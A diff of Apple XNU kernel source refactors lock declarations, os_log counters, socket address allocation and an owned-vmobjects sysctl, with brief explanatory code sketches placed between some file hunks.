@@ -3462,17 +3401,17 @@ sysctl_debug_test_stackshot_mutex_owner(__unused struct sysctl_oid *oidp, __unus
        long long mtx_unslid_addr = (long long)VM_KERNEL_UNSLIDE_OR_PERM(&sysctl_debug_test_stackshot_owner_lck);
        int error = sysctl_io_number(req, mtx_unslid_addr, sizeof(long long), (void*)&option, NULL);
 
-       lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx);
+       lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx);
        if (!sysctl_debug_test_stackshot_mtx_inited) {
                lck_mtx_init(&sysctl_debug_test_stackshot_owner_lck,
-                   sysctl_debug_test_stackshot_owner_grp,
+                   &sysctl_debug_test_stackshot_owner_grp,
                    LCK_ATTR_NULL);
                semaphore_create(kernel_task,
                    &sysctl_debug_test_stackshot_mutex_sem,
                    SYNC_POLICY_FIFO, 0);
                sysctl_debug_test_stackshot_mtx_inited = 1;
        }
-       lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx);
+       lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx);
 
        if (!error) {
                switch (option) {
@@ -3489,15 +3428,15 @@ sysctl_debug_test_stackshot_mutex_owner(__unused struct sysctl_oid *oidp, __unus
                        semaphore_signal(sysctl_debug_test_stackshot_mutex_sem);
                        break;
                case SYSCTL_DEBUG_MTX_TEARDOWN:
-                       lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx);
+                       lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx);
 
                        lck_mtx_destroy(&sysctl_debug_test_stackshot_owner_lck,
-                           sysctl_debug_test_stackshot_owner_grp);
+                           &sysctl_debug_test_stackshot_owner_grp);
                        semaphore_destroy(kernel_task,
                            sysctl_debug_test_stackshot_mutex_sem);
                        sysctl_debug_test_stackshot_mtx_inited = 0;
 
-                       lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx);
+                       lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx);
                        break;
                case -1:         /* user just wanted to read the value, so do nothing */
                        break;
@@ -3543,10 +3482,10 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus
        long long rwlck_unslid_addr = (long long)VM_KERNEL_UNSLIDE_OR_PERM(&sysctl_debug_test_stackshot_owner_rwlck);
        int error = sysctl_io_number(req, rwlck_unslid_addr, sizeof(long long), (void*)&option, NULL);
 
-       lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx);
+       lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx);
        if (!sysctl_debug_test_stackshot_rwlck_inited) {
                lck_rw_init(&sysctl_debug_test_stackshot_owner_rwlck,
-                   sysctl_debug_test_stackshot_owner_grp,
+                   &sysctl_debug_test_stackshot_owner_grp,
                    LCK_ATTR_NULL);
                semaphore_create(kernel_task,
                    &sysctl_debug_test_stackshot_rwlck_sem,
@@ -3554,7 +3493,7 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus
                    0);
                sysctl_debug_test_stackshot_rwlck_inited = 1;
        }
-       lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx);
+       lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx);
 
        if (!error) {
                switch (option) {
@@ -3580,15 +3519,15 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus
                        semaphore_signal(sysctl_debug_test_stackshot_rwlck_sem);
                        break;
                case SYSCTL_DEBUG_KRWLCK_TEARDOWN:
-                       lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx);
+                       lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx);
 
                        lck_rw_destroy(&sysctl_debug_test_stackshot_owner_rwlck,
-                           sysctl_debug_test_stackshot_owner_grp);
+                           &sysctl_debug_test_stackshot_owner_grp);
                        semaphore_destroy(kernel_task,
                            sysctl_debug_test_stackshot_rwlck_sem);
                        sysctl_debug_test_stackshot_rwlck_inited = 0;
 
-                       lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx);
+                       lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx);
                        break;
                case -1:         /* user just wanted to read the value, so do nothing */
                        break;
@@ -4343,20 +4282,24 @@ extern int vm_page_delayed_work_ctx_needed;
 SYSCTL_INT(_vm, OID_AUTO, vm_page_needed_delayed_work_ctx, CTLFLAG_RD | CTLFLAG_LOCKED, &vm_page_delayed_work_ctx_needed, 0, "");
 
 /* log message counters for persistence mode */
-extern uint32_t oslog_p_total_msgcount;
-extern uint32_t oslog_p_metadata_saved_msgcount;
-extern uint32_t oslog_p_metadata_dropped_msgcount;
-extern uint32_t oslog_p_error_count;
-extern uint32_t oslog_p_saved_msgcount;
-extern uint32_t oslog_p_dropped_msgcount;
-extern uint32_t oslog_p_boot_dropped_msgcount;
-extern uint32_t oslog_p_coprocessor_total_msgcount;
-extern uint32_t oslog_p_coprocessor_dropped_msgcount;
+SCALABLE_COUNTER_DECLARE(oslog_p_total_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_metadata_saved_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_metadata_dropped_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_error_count);
+SCALABLE_COUNTER_DECLARE(oslog_p_saved_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_dropped_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_boot_dropped_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_coprocessor_total_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_coprocessor_dropped_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_unresolved_kc_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_fmt_invalid_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_fmt_max_args_msgcount);
+SCALABLE_COUNTER_DECLARE(oslog_p_truncated_msgcount);
 
 /* log message counters for streaming mode */
 extern uint32_t oslog_s_total_msgcount;
 extern uint32_t oslog_s_metadata_msgcount;
-extern uint32_t oslog_s_error_count;
+SCALABLE_COUNTER_DECLARE(oslog_s_error_count);
 extern uint32_t oslog_s_streamed_msgcount;
 extern uint32_t oslog_s_dropped_msgcount;
 
@@ -4369,19 +4312,24 @@ extern uint32_t oslog_msgbuf_dropped_charcount;
 extern uint32_t vaddlog_msgcount;
 extern uint32_t vaddlog_msgcount_dropped;
 
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_total_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_metadata_saved_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_metadata_saved_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_metadata_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_metadata_dropped_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_error_count, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_error_count, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_saved_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_saved_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_dropped_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_boot_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_boot_dropped_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_coprocessor_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_coprocessor_total_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_p_coprocessor_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_coprocessor_dropped_msgcount, 0, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_total_msgcount, oslog_p_total_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_metadata_saved_msgcount, oslog_p_metadata_saved_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_metadata_dropped_msgcount, oslog_p_metadata_dropped_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_error_count, oslog_p_error_count, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_saved_msgcount, oslog_p_saved_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_dropped_msgcount, oslog_p_dropped_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_boot_dropped_msgcount, oslog_p_boot_dropped_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_coprocessor_total_msgcount, oslog_p_coprocessor_total_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_coprocessor_dropped_msgcount, oslog_p_coprocessor_dropped_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_unresolved_kc_msgcount, oslog_p_unresolved_kc_msgcount, "");
+
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_fmt_invalid_msgcount, oslog_p_fmt_invalid_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_fmt_max_args_msgcount, oslog_p_fmt_max_args_msgcount, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_truncated_msgcount, oslog_p_truncated_msgcount, "");
 
 SYSCTL_UINT(_debug, OID_AUTO, oslog_s_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_total_msgcount, 0, "");
 SYSCTL_UINT(_debug, OID_AUTO, oslog_s_metadata_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_metadata_msgcount, 0, "");
-SYSCTL_UINT(_debug, OID_AUTO, oslog_s_error_count, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_error_count, 0, "");
+SYSCTL_SCALABLE_COUNTER(_debug, oslog_s_error_count, oslog_s_error_count, "");
 SYSCTL_UINT(_debug, OID_AUTO, oslog_s_streamed_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_streamed_msgcount, 0, "");
 SYSCTL_UINT(_debug, OID_AUTO, oslog_s_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_dropped_msgcount, 0, "");
 
@@ -4687,6 +4635,8 @@ SYSCTL_QUAD(_kern, OID_AUTO, driverkit_checkin_timed_out,
     &driverkit_checkin_timed_out, "timestamp of dext checkin timeout");
 #endif
 
+extern int IOGetVMMPresent(void);
+
 static int
 hv_vmm_present SYSCTL_HANDLER_ARGS
 {
@@ -4696,11 +4646,7 @@ hv_vmm_present SYSCTL_HANDLER_ARGS
 
        int hv_vmm_present = 0;
 
-#if defined (__arm64__)
-       /* <rdar://problem/59966231> Need a way to determine if ARM xnu is running as a guest */
-#elif defined (__x86_64__)
-       hv_vmm_present = cpuid_vmm_present();
-#endif
+       hv_vmm_present = IOGetVMMPresent();
 
        return SYSCTL_OUT(req, &hv_vmm_present, sizeof(hv_vmm_present));
 }
@@ -4810,7 +4756,7 @@ SYSCTL_PROC(_kern, OID_AUTO, sysent_const_check,
 #endif
 
 #if DEVELOPMENT || DEBUG
-SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED, NULL, 1, "");
+SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_KERN, NULL, 1, "");
 #else
 SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED, NULL, 0, "");
 #endif
@@ -5569,52 +5515,59 @@ sysctl_get_owned_vmobjects SYSCTL_HANDLER_ARGS
        mach_port_name_t task_port_name;
        task_t task;
        size_t buffer_size = (req->oldptr != USER_ADDR_NULL) ? req->oldlen : 0;
-       vmobject_list_output_t buffer;
+       vmobject_list_output_t buffer = NULL;
        size_t output_size;
        size_t entries;
 
+       /* we have a "newptr" (for write): we get a task port name from the caller. */
+       error = SYSCTL_IN(req, &task_port_name, sizeof(mach_port_name_t));
+
+       if (error != 0) {
+               goto sysctl_get_vmobject_list_exit;
+       }
+
+       task = port_name_to_task_read(task_port_name);
+       if (task == TASK_NULL) {
+               error = ESRCH;
+               goto sysctl_get_vmobject_list_exit;
+       }
+
+       /* get the current size */
+       task_copy_vmobjects(task, NULL, 0, &entries);
+       size_t max_size = (entries > 0) ? entries * sizeof(vm_object_query_data_t) + sizeof(*buffer) : 0;
+
+       /* if buffer_size is specified, clamp to the current size, then allocate the kernel buffer */
        if (buffer_size) {
                if (buffer_size < sizeof(*buffer) + sizeof(vm_object_query_data_t)) {
-                       return ENOMEM;
+                       error = ENOMEM;
+                       goto sysctl_get_vmobject_list_deallocate_and_exit;
                }
 
+               buffer_size = (buffer_size > max_size) ? max_size : buffer_size;
                buffer = kheap_alloc(KHEAP_TEMP, buffer_size, Z_WAITOK);
 
                if (!buffer) {
                        error = ENOMEM;
-                       goto sysctl_get_vmobject_list_exit;
+                       goto sysctl_get_vmobject_list_deallocate_and_exit;
                }
        } else {
                buffer = NULL;
        }
 
-       /* we have a "newptr" (for write) we get a task port name from the caller. */
-       error = SYSCTL_IN(req, &task_port_name, sizeof(mach_port_name_t));
-
-       if (error != 0) {
-               goto sysctl_get_vmobject_list_exit;
-       }
-
-       task = port_name_to_task(task_port_name);
-       if (task == TASK_NULL) {
-               error = ESRCH;
-               goto sysctl_get_vmobject_list_exit;
-       }
-
        /* copy the vmobjects and vmobject data out of the task */
        if (buffer_size == 0) {
-               task_copy_vmobjects(task, NULL, 0, &entries);
-               output_size = (entries > 0) ? entries * sizeof(vm_object_query_data_t) + sizeof(*buffer) : 0;
+               output_size = max_size;
        } else {
                task_copy_vmobjects(task, &buffer->data[0], buffer_size - sizeof(*buffer), &entries);
                buffer->entries = (uint64_t)entries;
                output_size = entries * sizeof(vm_object_query_data_t) + sizeof(*buffer);
        }
 
-       task_deallocate(task);
-
        error = SYSCTL_OUT(req, (char*) buffer, output_size);
 
+sysctl_get_vmobject_list_deallocate_and_exit:
+       task_deallocate(task);
+
 sysctl_get_vmobject_list_exit:
        if (buffer) {
                kheap_free(KHEAP_TEMP, buffer, buffer_size);
@@ -5626,3 +5579,20 @@ sysctl_get_vmobject_list_exit:
 SYSCTL_PROC(_vm, OID_AUTO, get_owned_vmobjects,
     CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_WR | CTLFLAG_MASKED | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
     0, 0, sysctl_get_owned_vmobjects, "A", "get owned vmobjects in task");
+
+extern uint64_t num_static_scalable_counters;
+SYSCTL_QUAD(_kern, OID_AUTO, num_static_scalable_counters, CTLFLAG_RD | CTLFLAG_LOCKED, &num_static_scalable_counters, "");
+
+uuid_string_t trial_treatment_id;
+uuid_string_t trial_experiment_id;
+int trial_deployment_id = -1;
+
+SYSCTL_STRING(_kern, OID_AUTO, trial_treatment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, trial_treatment_id, sizeof(trial_treatment_id), "");
+SYSCTL_STRING(_kern, OID_AUTO, trial_experiment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, trial_experiment_id, sizeof(trial_experiment_id), "");
+SYSCTL_INT(_kern, OID_AUTO, trial_deployment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &trial_deployment_id, 0, "");
+
+#if DEVELOPMENT || DEBUG
+/* For unit testing setting factors & limits. */
+unsigned int testing_experiment_factor;
+EXPERIMENT_FACTOR_UINT(_kern, testing_experiment_factor, &testing_experiment_factor, 5, 10, "");
+#endif /* DEVELOPMENT || DEBUG */
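
A minimal sketch of the per-CPU scalable-counter pattern adopted in the kern_sysctl.c hunks above, which replace plain uint32_t os_log counters exported via SYSCTL_UINT. It assumes SCALABLE_COUNTER_DEFINE, counter_inc and <kern/counter.h> behave as the declarations in those hunks suggest; the my_subsys_* names are hypothetical.

#include <kern/counter.h>
#include <sys/sysctl.h>

/* In the file that owns the counter: per-CPU storage plus a hot-path bump. */
SCALABLE_COUNTER_DEFINE(my_subsys_event_count);

static void
my_subsys_record_event(void)
{
	counter_inc(&my_subsys_event_count);    /* per-CPU increment, no shared cache line */
}

/* In the sysctl table: export the summed value read-only under _debug. */
SCALABLE_COUNTER_DECLARE(my_subsys_event_count);
SYSCTL_SCALABLE_COUNTER(_debug, my_subsys_event_count,
    my_subsys_event_count, "events recorded by my_subsys");
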
index eac338d176f3aebfc0e500d5fb5d6f818f65c756..f678647974b60a62f20fb192d80740f25cc31de4 100644 (file)
 #define HZ      100     /* XXX */
 
 /* simple lock used to access timezone, tz structure */
-lck_spin_t * tz_slock;
-lck_grp_t * tz_slock_grp;
-lck_attr_t * tz_slock_attr;
-lck_grp_attr_t  *tz_slock_grp_attr;
+static LCK_GRP_DECLARE(tz_slock_grp, "tzlock");
+static LCK_SPIN_DECLARE(tz_slock, &tz_slock_grp);
 
 static void             setthetime(
        struct timeval  *tv);
 
-void time_zone_slock_init(void);
 static boolean_t timeval_fixusec(struct timeval *t1);
 
 /*
@@ -151,9 +148,9 @@ gettimeofday(
        }
 
        if (uap->tzp) {
-               lck_spin_lock(tz_slock);
+               lck_spin_lock(&tz_slock);
                ltz = tz;
-               lck_spin_unlock(tz_slock);
+               lck_spin_unlock(&tz_slock);
 
                error = copyout((caddr_t)&ltz, CAST_USER_ADDR_T(uap->tzp), sizeof(tz));
        }
@@ -224,9 +221,9 @@ settimeofday(__unused struct proc *p, struct settimeofday_args  *uap, __unused i
                setthetime(&atv);
        }
        if (uap->tzp) {
-               lck_spin_lock(tz_slock);
+               lck_spin_lock(&tz_slock);
                tz = atz;
-               lck_spin_unlock(tz_slock);
+               lck_spin_unlock(&tz_slock);
        }
        return 0;
 }
@@ -921,21 +918,6 @@ ppsratecheck(struct timeval *lasttime, int *curpps, int maxpps)
 }
 #endif /* NETWORKING */
 
-void
-time_zone_slock_init(void)
-{
-       /* allocate lock group attribute and group */
-       tz_slock_grp_attr = lck_grp_attr_alloc_init();
-
-       tz_slock_grp =  lck_grp_alloc_init("tzlock", tz_slock_grp_attr);
-
-       /* Allocate lock attribute */
-       tz_slock_attr = lck_attr_alloc_init();
-
-       /* Allocate the spin lock */
-       tz_slock = lck_spin_alloc_init(tz_slock_grp, tz_slock_attr);
-}
-
 int
 __mach_bridge_remote_time(__unused struct proc *p, struct __mach_bridge_remote_time_args *mbrt_args, uint64_t *retval)
 {
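
A minimal sketch of the statically declared lock pattern that the kern_time.c change adopts in place of time_zone_slock_init and the runtime lck_*_alloc_init calls, assuming LCK_GRP_DECLARE and LCK_SPIN_DECLARE emit statically initialized objects as the hunk suggests; the example_* names are hypothetical.

#include <kern/locks.h>
#include <sys/time.h>

static LCK_GRP_DECLARE(example_grp, "example");
static LCK_SPIN_DECLARE(example_slock, &example_grp);

static struct timeval example_tv;       /* protected by example_slock */

static struct timeval
example_read_tv(void)
{
	struct timeval ltv;

	/* No boot-time init hook is needed; the lock is usable immediately. */
	lck_spin_lock(&example_slock);
	ltv = example_tv;
	lck_spin_unlock(&example_slock);
	return ltv;
}
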
index 2e111de759bd15b14310453dbfa7fe584efe61be..2a7942ce936ea4d6988786ff8db069b84a1938fa 100644 (file)
@@ -154,7 +154,7 @@ skip_cred_check:
 }
 
 extern void OSKextResetAfterUserspaceReboot(void);
-extern void zone_gc(boolean_t);
+extern void zone_gc_drain(void);
 
 int
 usrctl(struct proc *p, __unused struct usrctl_args *uap, __unused int32_t *retval)
@@ -184,7 +184,7 @@ usrctl(struct proc *p, __unused struct usrctl_args *uap, __unused int32_t *retva
        int shm_error = pshm_cache_purge_all(p);
        int sem_error = psem_cache_purge_all(p);
 
-       zone_gc(FALSE);
+       zone_gc_drain();
 
        return shm_error != 0 ? shm_error : sem_error;
 }
index 8cd16e22061498630bc1b0d737a3bbfde629534e..8e1d821ce3564e9fa5d0ec5a6e057412e1c0f732 100644 (file)
@@ -52,7 +52,7 @@ static const mbuf_flags_t mbuf_cflags_mask = (MBUF_EXT);
 #define MAX_MBUF_TX_COMPL_FUNC 32
 mbuf_tx_compl_func
     mbuf_tx_compl_table[MAX_MBUF_TX_COMPL_FUNC];
-extern lck_rw_t *mbuf_tx_compl_tbl_lock;
+extern lck_rw_t mbuf_tx_compl_tbl_lock;
 u_int32_t mbuf_tx_compl_index = 0;
 
 #if (DEVELOPMENT || DEBUG)
@@ -1782,11 +1782,11 @@ get_tx_compl_callback_index(mbuf_tx_compl_func callback)
 {
        u_int32_t i;
 
-       lck_rw_lock_shared(mbuf_tx_compl_tbl_lock);
+       lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock);
 
        i = get_tx_compl_callback_index_locked(callback);
 
-       lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock);
+       lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock);
 
        return i;
 }
@@ -1800,9 +1800,9 @@ m_get_tx_compl_callback(u_int32_t idx)
                ASSERT(0);
                return NULL;
        }
-       lck_rw_lock_shared(mbuf_tx_compl_tbl_lock);
+       lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock);
        cb = mbuf_tx_compl_table[idx];
-       lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock);
+       lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock);
        return cb;
 }
 
@@ -1816,7 +1816,7 @@ mbuf_register_tx_compl_callback(mbuf_tx_compl_func callback)
                return EINVAL;
        }
 
-       lck_rw_lock_exclusive(mbuf_tx_compl_tbl_lock);
+       lck_rw_lock_exclusive(&mbuf_tx_compl_tbl_lock);
 
        i = get_tx_compl_callback_index_locked(callback);
        if (i != -1) {
@@ -1834,7 +1834,7 @@ mbuf_register_tx_compl_callback(mbuf_tx_compl_func callback)
                }
        }
 unlock:
-       lck_rw_unlock_exclusive(mbuf_tx_compl_tbl_lock);
+       lck_rw_unlock_exclusive(&mbuf_tx_compl_tbl_lock);
 
        return error;
 }
@@ -1849,7 +1849,7 @@ mbuf_unregister_tx_compl_callback(mbuf_tx_compl_func callback)
                return EINVAL;
        }
 
-       lck_rw_lock_exclusive(mbuf_tx_compl_tbl_lock);
+       lck_rw_lock_exclusive(&mbuf_tx_compl_tbl_lock);
 
        /* assume the worst */
        error = ENOENT;
@@ -1861,7 +1861,7 @@ mbuf_unregister_tx_compl_callback(mbuf_tx_compl_func callback)
                }
        }
 unlock:
-       lck_rw_unlock_exclusive(mbuf_tx_compl_tbl_lock);
+       lck_rw_unlock_exclusive(&mbuf_tx_compl_tbl_lock);
 
        return error;
 }
@@ -1950,9 +1950,9 @@ m_do_tx_compl_callback(struct mbuf *m, struct ifnet *ifp)
                        continue;
                }
 
-               lck_rw_lock_shared(mbuf_tx_compl_tbl_lock);
+               lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock);
                callback = mbuf_tx_compl_table[i];
-               lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock);
+               lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock);
 
                if (callback != NULL) {
                        callback(m->m_pkthdr.pkt_compl_context,
index 30d0b513ac000daf835d186c45966d5c06220f41..53f886c28c8558f959dcc19d590a7dfc032b1d8c 100644 (file)
@@ -237,7 +237,7 @@ sock_bind(socket_t sock, const struct sockaddr *to)
        }
 
        if (to->sa_len > sizeof(ss)) {
-               MALLOC(sa, struct sockaddr *, to->sa_len, M_SONAME, M_WAITOK);
+               sa = kheap_alloc(KHEAP_TEMP, to->sa_len, Z_WAITOK);
                if (sa == NULL) {
                        return ENOBUFS;
                }
@@ -250,7 +250,7 @@ sock_bind(socket_t sock, const struct sockaddr *to)
        error = sobindlock(sock, sa, 1);        /* will lock socket */
 
        if (sa != NULL && want_free == TRUE) {
-               FREE(sa, M_SONAME);
+               kheap_free(KHEAP_TEMP, sa, sa->sa_len);
        }
 
        return error;
@@ -270,8 +270,8 @@ sock_connect(socket_t sock, const struct sockaddr *to, int flags)
        }
 
        if (to->sa_len > sizeof(ss)) {
-               MALLOC(sa, struct sockaddr *, to->sa_len, M_SONAME,
-                   (flags & MSG_DONTWAIT) ? M_NOWAIT : M_WAITOK);
+               sa = kheap_alloc(KHEAP_TEMP, to->sa_len,
+                   (flags & MSG_DONTWAIT) ? Z_NOWAIT : Z_WAITOK);
                if (sa == NULL) {
                        return ENOBUFS;
                }
@@ -323,7 +323,7 @@ out:
        socket_unlock(sock, 1);
 
        if (sa != NULL && want_free == TRUE) {
-               FREE(sa, M_SONAME);
+               kheap_free(KHEAP_TEMP, sa, sa->sa_len);
        }
 
        return error;
@@ -475,9 +475,8 @@ sogetaddr_locked(struct socket *so, struct sockaddr **psa, int peer)
 
        if (error == 0 && *psa == NULL) {
                error = ENOMEM;
-       } else if (error != 0 && *psa != NULL) {
+       } else if (error != 0) {
                FREE(*psa, M_SONAME);
-               *psa = NULL;
        }
        return error;
 }
@@ -501,9 +500,7 @@ sock_getaddr(socket_t sock, struct sockaddr **psa, int peer)
 void
 sock_freeaddr(struct sockaddr *sa)
 {
-       if (sa != NULL) {
-               FREE(sa, M_SONAME);
-       }
+       FREE(sa, M_SONAME);
 }
 
 errno_t
@@ -806,9 +803,7 @@ cleanup:
        if (control != NULL) {
                m_freem(control);
        }
-       if (fromsa != NULL) {
-               FREE(fromsa, M_SONAME);
-       }
+       FREE(fromsa, M_SONAME);
        return error;
 }
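
A minimal sketch of the allocator migration shown in the kpi_socket.c hunks above: MALLOC/FREE with the M_SONAME type is replaced by kheap_alloc/kheap_free on KHEAP_TEMP, and because kheap_free takes the allocation size, these paths recover it from sa_len. The example_* helpers are hypothetical.

#include <kern/kalloc.h>
#include <sys/errno.h>
#include <sys/socket.h>
#include <string.h>

static int
example_copy_sockaddr(const struct sockaddr *src, struct sockaddr **out)
{
	struct sockaddr *sa;

	sa = kheap_alloc(KHEAP_TEMP, src->sa_len, Z_WAITOK);
	if (sa == NULL) {
		return ENOBUFS;
	}
	bcopy(src, sa, src->sa_len);
	*out = sa;
	return 0;
}

static void
example_free_sockaddr(struct sockaddr *sa)
{
	/* The free path needs the original allocation size; sa_len carries it here. */
	kheap_free(KHEAP_TEMP, sa, sa->sa_len);
}
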
 
index 4492cf15faf5024d8a7003af557b1a3ef0fe3d86..8c3976246fd36a3ca8d17865c5495a8fbb58c273 100644 (file)
 #define SFEF_NODETACH           0x2     /* Detach should not be called */
 #define SFEF_NOSOCKET           0x4     /* Socket is gone */
 
+/*
+ * If you need accounting for KM_IFADDR, consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_IFADDR       KHEAP_DEFAULT
+
 struct socket_filter_entry {
        struct socket_filter_entry      *sfe_next_onsocket;
        struct socket_filter_entry      *sfe_next_onfilter;
@@ -85,9 +91,12 @@ struct socket_filter {
 
 TAILQ_HEAD(socket_filter_list, socket_filter);
 
-static struct socket_filter_list        sock_filter_head;
-static lck_rw_t                         *sock_filter_lock = NULL;
-static lck_mtx_t                        *sock_filter_cleanup_lock = NULL;
+static LCK_GRP_DECLARE(sock_filter_lock_grp, "socket filter lock");
+static LCK_RW_DECLARE(sock_filter_lock, &sock_filter_lock_grp);
+static LCK_MTX_DECLARE(sock_filter_cleanup_lock, &sock_filter_lock_grp);
+
+static struct socket_filter_list        sock_filter_head =
+    TAILQ_HEAD_INITIALIZER(sock_filter_head);
 static struct socket_filter_entry       *sock_filter_cleanup_entries = NULL;
 static thread_t                         sock_filter_cleanup_thread = NULL;
 
@@ -143,26 +152,6 @@ sflt_permission_check(struct inpcb *inp)
        return 0;
 }
 
-__private_extern__ void
-sflt_init(void)
-{
-       lck_grp_attr_t  *grp_attrib = NULL;
-       lck_attr_t      *lck_attrib = NULL;
-       lck_grp_t       *lck_group = NULL;
-
-       TAILQ_INIT(&sock_filter_head);
-
-       /* Allocate a rw lock */
-       grp_attrib = lck_grp_attr_alloc_init();
-       lck_group = lck_grp_alloc_init("socket filter lock", grp_attrib);
-       lck_grp_attr_free(grp_attrib);
-       lck_attrib = lck_attr_alloc_init();
-       sock_filter_lock = lck_rw_alloc_init(lck_group, lck_attrib);
-       sock_filter_cleanup_lock = lck_mtx_alloc_init(lck_group, lck_attrib);
-       lck_grp_free(lck_group);
-       lck_attr_free(lck_attrib);
-}
-
 static void
 sflt_retain_locked(struct socket_filter *filter)
 {
@@ -175,14 +164,14 @@ sflt_release_locked(struct socket_filter *filter)
        if (os_ref_release_locked(&filter->sf_refcount) == 0) {
                /* Call the unregistered function */
                if (filter->sf_filter.sf_unregistered) {
-                       lck_rw_unlock_exclusive(sock_filter_lock);
+                       lck_rw_unlock_exclusive(&sock_filter_lock);
                        filter->sf_filter.sf_unregistered(
                                filter->sf_filter.sf_handle);
-                       lck_rw_lock_exclusive(sock_filter_lock);
+                       lck_rw_lock_exclusive(&sock_filter_lock);
                }
 
